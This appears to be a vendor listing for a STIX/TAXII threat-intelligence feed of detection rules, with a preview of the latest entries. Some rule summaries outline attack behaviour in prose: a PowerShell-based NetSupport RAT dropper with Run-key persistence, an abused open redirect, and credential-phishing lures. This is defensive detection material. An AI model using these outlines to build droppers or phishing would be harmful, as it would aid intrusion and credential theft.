Description:
A full collection of new rules and rule modifications. Rules are pre-processed and are shipped with extracted key observables (IPs, hashes, etc.) for direct use in SIEM/TIP platforms. The feed is designed for SOC teams and detection engineers who need reliable, actionable data for direct use in SIEM/TIP platforms and for CTI correlation. The inclusion of rule updates also aids teams in maintaining and refining their own detection logic by observing community best practices.
Contents:
Identity: 39 Indicator: 7996 Directory: 3608Domain-Name: 1075Email-Addr: 28File: 4567Ipv4-Addr: 54Ipv6-Addr: 12Process: 6557Relationship: 26421Windows-Registry-Key: 844
Application:
- Informed detection engineering - reduce the significant manual effort of discovering, collecting, parsing, normalizing, and extracting value from public rule repositories.
- Direct SIEM/TIP/SOAR integration - the structured STIX2.1 format with explicit observables allows for straightforward ingestion and use in your existing security platforms.
- Improved threat hunting - leverage detection logic and extracted observables for proactive threat hunting exercises.
- Improved coverage and performance - the information about new rules and the details on rule modifications helps your team to maintain and tune their existing rules easier.
- CTI correlation - match observables against your other threat intelligence feeds, internal logs, and CTI databases to uncover related activity and inform your detection priorisation.
STIX/TAXII endpoints:
Content preview:
Latest 10 entities:
| Details | |
|---|---|
 | ANY.RUN Obfuscated BAT Dropper Delivers NetSupport RAT post Kql New rule This KQL query detects the execution of an obfuscated BAT dropper that delivers the NetSupport RAT. It identifies instances where cmd.exe initiates a .bat file, which in turn executes PowerShell with hidden window style and Invoke-WebRequest, followed by registry modifications to add client32.exe to the Run key. Relevant MITRE ATT&CK tactics: TA0005, TA0003 Relevant MITRE ATT&CK techniques: T1059.003, T1566.001, T1547.001 malicious-activity TA0005 TA0003 T1059.003 T1566.001 T1547.001 |
| Open Redirect: bananaguide.com Sublime-Security New rule This rule detects the use of the bananaguide.com redirect with a URL parameter in messages, which has been exploited in the wild. The rule checks for inbound message types containing links where the domain is bananaguide.com, the path is /thru.php, and the URL parameter is present and not redirecting back to bananaguide.com. It also negates trusted sender domains unless they fail DMARC authentication and excludes messages from bananaguide.com. Relevant MITRE ATT&CK tactics: TA0001, TA0009 Relevant MITRE ATT&CK techniques: T1598, T1189, T1204, T1566 credential-access malicious-activity TA0001 TA0009 T1598 T1189 T1204 T1566 |
| Credential phishing: Email delivery failure impersonation Sublime-Security New rule This rule detects phishing emails that impersonate email system notifications regarding delivery failures or other email system issues. It identifies emails that request users to take action to 'fix' or 'recover' their email functionality, which typically leads to credential harvesting portals. The rule analyzes email content, sender information, and links to identify potential phishing attempts. Relevant MITRE ATT&CK tactics: TA0001, TA0006 Relevant MITRE ATT&CK techniques: T1566, T1566.002, T1598, T1598.007 credential-access phishing TA0001 TA0006 T1566 T1566.002 T1598 T1598.007 |
 | file--0c1f67c1-3818-5514-b383-c56c23bb50aa |
 | process--c4988bad-df6a-4661-9a3b-a272f1efb204 |
 | windows-registry-key--6879fcd9-ca48-558a-90a0-ce718860f913 |
 | domain-name--a55309c3-ab50-531c-a66c-adf04038bdb9 |
| domain-name--2d8f3d77-dc85-5b86-90c1-bc48e6f8eb2d |
 | relationship--71350844-f54c-4dda-9efc-14ff4203e0a2 |
| relationship--07f3ab79-2d1b-4560-8b41-b758bd59b2c7 |